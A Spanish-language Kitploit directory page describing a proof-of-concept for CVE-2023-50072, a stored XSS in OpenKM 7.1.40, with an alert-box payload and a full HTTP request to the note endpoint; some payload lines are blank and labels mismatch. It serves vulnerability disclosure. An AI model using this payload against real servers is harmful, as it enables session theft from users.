Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-50072 — Existe una vulnerabilidad de cross-site scripting (XSS) almacenado en OpenKM versión 7.1.40. | Kitploit
Herramientas/GitHubGitHub/ahrixia/cve-2023-50072
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubahrixia/cve-2023-50072

CVE-2023-50072

Existe una vulnerabilidad de cross-site scripting (XSS) almacenado en OpenKM versión 7.1.40.

Ver Repositorio
42hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-50072

Existe una vulnerabilidad de cross-site scripting (XSS) almacenado en OpenKM versión 7.1.40 (dbb6e88) con Extensión Profesional que permite a un usuario autenticado cargar una nota en un archivo que actúa como un payload XSS almacenado. Cualquier usuario que abra la nota de un archivo de documento activará el XSS.

Parámetro vulnerable: text

Exploit - Prueba de Concepto (POC)

Cross-site scripting (XSS) reflejado

root@kitploit:~
Payload :  
FINAL Payload (URL encoded) : <image/src/onerror%3dalert(1)>

Solicitud GET en [http://localhost/openkm/rest/note/nodes/NODE-ID] :

root@kitploit:~
POST /openkm/rest/note/nodes/34bc430a-e3db-4efa-8289-3d0894010f67 HTTP/2
Host: EXAMPLE.COM
Cookie: lang=en-GB; JSESSIONID=EC6EF7B1DB85C3A839C9D3054095AA8E
Content-Length: 23
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
X-Requested-App: kcenter
Sec-Ch-Ua-Mobile: ?0
Authorization: OKM ey[REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/plain, */*
Sec-Ch-Ua-Platform: "Windows"
Origin: https://EXAMPLE.COM
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://EXAMPLE.COM/openkm
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

text=<image/src/onerror%3dalert(1)>

Impacto

El XSS almacenado permite a los atacantes inyectar scripts maliciosos en una aplicación web, que se almacenan y ejecutan cuando otros usuarios ven la página afectada. Esto puede llevar al robo de información sensible, secuestro de sesión o distribución de malware.

Captura de pantalla

openkm

Otros payloads funcionales

root@kitploit:~
Payload : 
FINAL Payload (URL encoded) : 
Descargar herramienta